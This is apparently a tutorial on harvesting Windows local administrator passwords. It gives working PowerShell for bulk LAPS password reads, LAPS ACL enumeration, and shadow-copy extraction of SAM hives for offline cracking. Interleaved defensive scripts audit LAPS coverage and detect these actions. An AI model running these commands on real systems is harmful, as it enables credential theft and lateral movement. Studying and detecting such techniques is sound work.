Automating Local Administrator Password Discovery for Privilege Escalation with PowerShell
Local administrator accounts are a persistent vector for privilege escalation on Windows networks. Their mismanagement often provides an avenue for lateral movement and full domain compromise. Automating the discovery of these passwords, particularly in environments leveraging solutions like Local Administrator Password Solution (LAPS), significantly reduces the time to escalate privileges, turning a laborious manual hunt into a swift, programmatic extraction. This post details the reconnaissance and exploitation techniques using PowerShell to discover local administrator passwords for immediate privilege escalation.
Initial Reconnaissance: Identifying Targets and LAPS Deployment
Before attempting to discover passwords, identifying potential targets and verifying the presence of LAPS is crucial. LAPS is designed to mitigate the threat of compromised local administrator accounts by setting a unique, randomly generated password on each machine and storing it in Active Directory. Its deployment, however, gives an attacker who holds the right permissions a centralized point from which to query those passwords.
Active Directory Enumeration for LAPS Presence
The first step is to enumerate Active Directory (AD) for attributes related to LAPS. We look for the `ms-Mcs-AdmPwd` attribute, which stores the password, and `ms-Mcs-AdmPwdExpirationTime`, which indicates when the password will next change. The absence of these attributes on computer objects suggests LAPS is not deployed, or not configured for those specific objects. Note that these are the attributes of the legacy Microsoft LAPS; the newer Windows LAPS writes to `msLAPS-*` attributes instead and can store the password encrypted, so machines managed by it will not show up in the query below.
A simple PowerShell one-liner can query a domain controller for computer objects possessing the LAPS attributes. This helps to confirm LAPS deployment and identify the scope of its use across the environment.
Get-ADComputer -Filter 'ms-Mcs-AdmPwd -like "*"' -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime | Select-Object Name, ms-Mcs-AdmPwdExpirationTime, @{N='LAPS Password'; E={$_.'ms-Mcs-AdmPwd'}}
This command returns a list of computer names, their LAPS password expiration times, and the LAPS password itself, assuming the executing user has read permission on the `ms-Mcs-AdmPwd` attribute. If the caller lacks that permission, AD does not raise an error; the attribute is simply omitted from the results, so an empty `LAPS Password` column means "no access", not "no LAPS".
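The same attributes can be read from the defender's side to audit LAPS coverage without touching the password at all. The following is an added example, not code from the original post; it reads only `ms-Mcs-AdmPwdExpirationTime`, so it works under an account that has no right to `ms-Mcs-AdmPwd`, and the `$MaxAgeDays` threshold and domain-wide search base are assumptions.

```powershell
# Added example (not from the original post): defender-side audit of LAPS coverage.
# Reads only Name and ms-Mcs-AdmPwdExpirationTime, never the password attribute itself.
# Assumes the ActiveDirectory module; $SearchBase and $MaxAgeDays are our own defaults.
Import-Module ActiveDirectory

function Get-LapsCoverageReport {
    param(
        [string]$SearchBase = (Get-ADDomain).DistinguishedName,  # assumption: whole domain
        [int]$MaxAgeDays = 45                                    # assumption: policy rotation interval
    )
    $now = (Get-Date).ToUniversalTime()
    Get-ADComputer -Filter 'Enabled -eq $true' -SearchBase $SearchBase `
        -Properties ms-Mcs-AdmPwdExpirationTime, OperatingSystem, LastLogonDate |
    ForEach-Object {
        $raw = $_.'ms-Mcs-AdmPwdExpirationTime'
        if (-not $raw) {
            $state  = 'NotManaged'      # attribute never written: LAPS client or GPO not applied
            $expiry = $null
        } else {
            # Stored as a Windows FILETIME (100 ns ticks since 1601-01-01 UTC)
            $expiry = [DateTime]::FromFileTimeUtc([int64]$raw)
            if ($expiry -lt $now) { $state = 'Expired' }                             # rotation overdue
            elseif ($expiry -gt $now.AddDays($MaxAgeDays)) { $state = 'ExpiryTooFar' } # pushed beyond policy
            else { $state = 'Healthy' }
        }
        [pscustomobject]@{
            Name            = $_.Name
            OperatingSystem = $_.OperatingSystem
            LastLogonDate   = $_.LastLogonDate
            LapsExpiryUtc   = $expiry
            State           = $state
        }
    }
}

# Summary by state, then the machines that need attention
$report = Get-LapsCoverageReport
$report | Group-Object State | Select-Object Name, Count | Format-Table -AutoSize
$report | Where-Object State -ne 'Healthy' | Sort-Object State, Name | Format-Table -AutoSize
```

An `ExpiryTooFar` entry is worth a second look: the attribute can be written by anyone with write access to it, and setting it far in the future is a known way to stop a password from rotating.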
Local Administrator Password Solution (LAPS) Exploitation
LAPS is a powerful tool for defenders, but if an attacker gains control of an account with elevated privileges, or exploits a misconfiguration, it becomes a goldmine. The critical aspect of LAPS exploitation is understanding and leveraging the permissions model.
Understanding LAPS Permissions
By default, only the computer object itself and accounts with full control over it (Domain Admins, Enterprise Admins) can read the LAPS password attribute. However, delegated permissions are common. Service accounts, help desk personnel, or specific administrative groups are often granted explicit `Read-Property` access to the `ms-Mcs-AdmPwd` attribute on OUs containing computer objects. Our goal is to identify these accounts or compromise one that already possesses this permission.
To determine which users or groups have read access to LAPS passwords on computer objects within a specific Organizational Unit (OU), we can inspect the Access Control Lists (ACLs). This requires the `ActiveDirectory` module and permission to read the security descriptors involved.
# Resolve the schemaIDGUID of ms-Mcs-AdmPwd from the schema (there is no Get-ADSchemaAttribute cmdlet)
$lapsGuid = [guid](Get-ADObject -SearchBase (Get-ADRootDSE).schemaNamingContext -LDAPFilter '(lDAPDisplayName=ms-Mcs-AdmPwd)' -Properties schemaIDGUID).schemaIDGUID
Get-ADObject -Identity "OU=Workstations,DC=contoso,DC=com" -Properties nTSecurityDescriptor | Select-Object -ExpandProperty nTSecurityDescriptor | ForEach-Object {
    # ReadProperty on the attribute itself, on all properties (empty ObjectType GUID), or GenericAll all expose the password
    $_.Access | Where-Object { $_.ActiveDirectoryRights -match "ReadProperty|GenericAll" -and ($_.ObjectType -eq $lapsGuid -or $_.ObjectType -eq [guid]::Empty) } | Select-Object IdentityReference, ActiveDirectoryRights, AccessControlType, IsInherited
}
This script lists the principals that hold read rights on the LAPS attribute within the given OU. A grant scoped to the attribute is the obvious case, but a `ReadProperty` grant covering all properties, or `GenericAll`, exposes the password just as effectively, which is why the filter accepts both. Identifying accounts with these permissions is a direct path to password discovery.
Querying LAPS Passwords with Existing Permissions
Once an account with read access to the `ms-Mcs-AdmPwd` attribute is identified or compromised, retrieving the passwords is straightforward. The `Get-ADComputer` cmdlet, as shown previously, is the primary tool; with it, an attacker can enumerate every local administrator password within their scope in a single query, which is invaluable for lateral movement.
# Assuming current user has read permissions on ms-Mcs-AdmPwd attribute
# To get all LAPS passwords for all computers in the domain:
Get-ADComputer -Filter 'ms-Mcs-AdmPwd -like "*"' -Properties Name, ms-Mcs-AdmPwd | Select-Object Name, @{N='LAPS_Password'; E={$_.'ms-Mcs-AdmPwd'}} | Format-Table -AutoSize
# To get the LAPS password for a specific computer:
(Get-ADComputer -Identity "TargetPC01" -Properties ms-Mcs-AdmPwd).'ms-Mcs-AdmPwd'
The output of these commands is the actual LAPS-managed local administrator passwords. This represents a significant privilege escalation, as an attacker can now authenticate as a local administrator on any target machine for which they retrieved the password.
Name LAPS_Password
---- -------------
SERVER01 P@$$w0rd123!
CLIENT05 LapsP@$$W0rd!
HOST_HR AdminPass_01
...
This output immediately provides credentials for lateral movement. The `Format-Table -AutoSize` ensures readable output, but for scripting, the raw `Select-Object` output can be piped to `Export-Csv` or similar for programmatic use.
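Every read of `ms-Mcs-AdmPwd` shown above is visible to the domain controller if directory access auditing is on. The following is an added example, not code from the original post, that pulls those reads out of the Security log as event 4662 and flags readers outside an allow-list. It assumes "Audit Directory Service Access" is enabled and that a SACL audits `ReadProperty` on the attribute (legacy LAPS provides `Set-AdmPwdAuditing` for that); the look-back window, DC name and allow-list are constructed values.

```powershell
# Added example (not from the original post): who read LAPS passwords, from a DC's Security log.
# Assumes directory service access auditing plus a SACL on ms-Mcs-AdmPwd; otherwise 4662 is not logged.
Import-Module ActiveDirectory

function Get-LapsPasswordReadEvents {
    param(
        [datetime]$Since = (Get-Date).AddDays(-7),    # assumption: look-back window
        [string]$ComputerName = $env:COMPUTERNAME     # assumption: the DC to query
    )
    # Resolve the attribute GUID from the schema rather than hard-coding it
    $schemaNC = (Get-ADRootDSE).schemaNamingContext
    $attr = Get-ADObject -SearchBase $schemaNC -LDAPFilter '(lDAPDisplayName=ms-Mcs-AdmPwd)' -Properties schemaIDGUID
    $lapsGuid = ([guid]$attr.schemaIDGUID).Guid        # string form, no braces

    Get-WinEvent -ComputerName $ComputerName -FilterHashtable @{
        LogName = 'Security'; Id = 4662; StartTime = $Since
    } -ErrorAction SilentlyContinue | ForEach-Object {
        $x = [xml]$_.ToXml()
        $d = @{}
        foreach ($f in $x.Event.EventData.Data) { $d[$f.Name] = $f.'#text' }
        # Properties lists the attribute GUIDs touched by this access; match the LAPS one
        if ($d['Properties'] -match [regex]::Escape($lapsGuid)) {
            [pscustomobject]@{
                TimeCreated = $_.TimeCreated
                Reader      = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
                ObjectName  = $d['ObjectName']      # DN or GUID of the computer object read
                AccessMask  = $d['AccessMask']      # 0x10 = ReadProperty
                Source      = $ComputerName
            }
        }
    }
}

# Allow-list the accounts expected to read LAPS passwords and surface everything else
$expected = @('CONTOSO\svc-laps', 'CONTOSO\helpdesk-admin')   # assumption: constructed allow-list
Get-LapsPasswordReadEvents |
    Where-Object { $expected -notcontains $_.Reader } |
    Group-Object Reader | Sort-Object Count -Descending |
    Select-Object Name, Count, @{N='FirstSeen'; E={ ($_.Group | Sort-Object TimeCreated)[0].TimeCreated }} |
    Format-Table -AutoSize
```

A single reader with a high count across many distinct `ObjectName` values in a short window is the signature of the bulk `Get-ADComputer` query above rather than a help-desk lookup of one machine.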
Alternative Discovery: SAM Hashing and Offline Attacks
While LAPS is the most efficient target for automated discovery in AD-integrated environments, situations exist where LAPS is not deployed, or a different initial foothold (e.g., physical access, unprivileged file system access) allows for alternative password discovery methods. One such method involves dumping the Security Account Manager (SAM) database.
Dumping SAM Hashes
The SAM database stores local user account passwords in hashed form. Direct access to the hive files is normally blocked because the kernel holds them open, but techniques exist to bypass this protection. They often involve the Volume Shadow Copy Service (VSS) or exploiting vulnerabilities that allow reading protected system files.
One common method involves creating a shadow copy of the system drive and then extracting the `SAM`, `SYSTEM`, and `SECURITY` registry hives from it. These hives, when combined, allow for the extraction of NTLM hashes for local accounts using external tools.
# Requires local administrator rights: creating a shadow copy and reading the hives are both privileged
New-Item -ItemType Directory -Path "C:\Temp" -Force | Out-Null
# Create a shadow copy of the system volume
$drive = Get-WmiObject Win32_Volume -Filter "DriveLetter='C:'"
$result = ([wmiclass]"Win32_ShadowCopy").Create($drive.DeviceID, "ClientAccessible")
if ($result.ReturnValue -ne 0) { throw "Shadow copy creation failed with return code $($result.ReturnValue)" }
$shadow = $result.ShadowID   # Create() exposes ShadowID, not ShadowCopyID
# Locate the shadow copy's device object, e.g. \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
$shadowCopyObj = Get-WmiObject Win32_ShadowCopy | Where-Object { $_.ID -eq $shadow }
$shadowPath = $shadowCopyObj.DeviceObject
# Copy the registry hives out of the shadow copy. Copy-Item generally rejects the \\?\GLOBALROOT
# device path, so the copy goes through cmd.exe, which accepts it.
foreach ($hive in 'SAM', 'SYSTEM', 'SECURITY') {
    cmd /c copy "$shadowPath\Windows\System32\config\$hive" "C:\Temp\$hive" | Out-Null
}
# Delete the shadow copy
# (Get-WmiObject Win32_ShadowCopy -Filter "ID='$shadow'").Delete()
Write-Host "SAM, SYSTEM, and SECURITY hives copied to C:\Temp\"
Write-Host "Use an external tool like secretsdump.py to extract hashes."
This PowerShell script facilitates the copying of the critical registry hives. Once these files are obtained, an attacker can move them to an offline system for hash extraction and cracking using tools like Impacket's `secretsdump.py` or Mimikatz. This method, however, requires administrative privileges (or an equivalent misconfiguration) to create the shadow copy and read the protected files, and it leaves artifacts: a new shadow copy on the volume, the WMI call itself, and the hive copies on disk, all of which are observable by endpoint monitoring.
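The script above is exactly the kind of activity PowerShell Script Block Logging (event 4104 in `Microsoft-Windows-PowerShell/Operational`) records in full. The following is an added example, not code from the original post, that scores logged script blocks against a small indicator list and checks itself against a constructed sample; it assumes script block logging is enabled by GPO, and the indicator list is our own, not a vendor signature.

```powershell
# Added example (not from the original post): detect the hive-collection pattern in script block logs.
# Assumes script block logging (event 4104) is enabled; indicators and the sample are our own constructions.
$HiveIndicators = @(
    'Win32_ShadowCopy',                      # VSS created from script rather than by backup software
    'HarddiskVolumeShadowCopy',              # GLOBALROOT device path of a shadow copy
    '\\config\\(SAM|SYSTEM|SECURITY)\b',     # the three hives needed for offline extraction
    'secretsdump|mimikatz'                   # tooling named in the script itself
)

function Test-HiveCollectionScript {
    # Returns the indicators that fired so an analyst sees why a block matched
    param([Parameter(Mandatory)][string]$ScriptBlockText)
    $hits = @()
    foreach ($re in $HiveIndicators) {
        if ($ScriptBlockText -match $re) { $hits += $re }
    }
    # One indicator alone is noisy (backup scripts also use VSS); require two to alert
    [pscustomobject]@{ Alert = ($hits.Count -ge 2); Indicators = $hits }
}

function Find-HiveCollectionEvents {
    param([datetime]$Since = (Get-Date).AddDays(-1))   # assumption: look-back window
    Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $Since
    } -ErrorAction SilentlyContinue | ForEach-Object {
        $x = [xml]$_.ToXml()
        $text = ($x.Event.EventData.Data | Where-Object Name -eq 'ScriptBlockText').'#text'
        if (-not $text) { return }
        $r = Test-HiveCollectionScript -ScriptBlockText $text
        if ($r.Alert) {
            [pscustomobject]@{
                TimeCreated = $_.TimeCreated
                User        = $_.UserId            # SID of the account that ran the block
                Indicators  = $r.Indicators -join ', '
                Excerpt     = $text.Substring(0, [Math]::Min(120, $text.Length))
            }
        }
    }
}

# Constructed sample resembling the hive-copy script; checks the rule offline before reading the log
$sample = '$s = ([wmiclass]"Win32_ShadowCopy").Create("C:\", "ClientAccessible"); cmd /c copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM" C:\Temp\SAM'
Test-HiveCollectionScript -ScriptBlockText $sample    # Alert = True with three indicators
Find-HiveCollectionEvents | Format-Table -AutoSize
```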
Cracking Hashes
Once the NTLM hashes for local administrator accounts are extracted from the SAM database (e.g., `Administrator:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::`; note that this particular NT hash is the well-known hash of an empty password) they can be fed into password cracking tools such as Hashcat or John the Ripper. Offline cracking is significantly faster and safer than online brute-forcing, as it doesn't risk account lockouts or trigger security alerts. The success rate depends heavily on password complexity and the strength of the cracking rig and wordlists.
The automation here lies in the script's ability to swiftly collect the necessary files. The subsequent cracking phase is an offline process, but without the initial automated discovery of the hashes, it wouldn't be possible.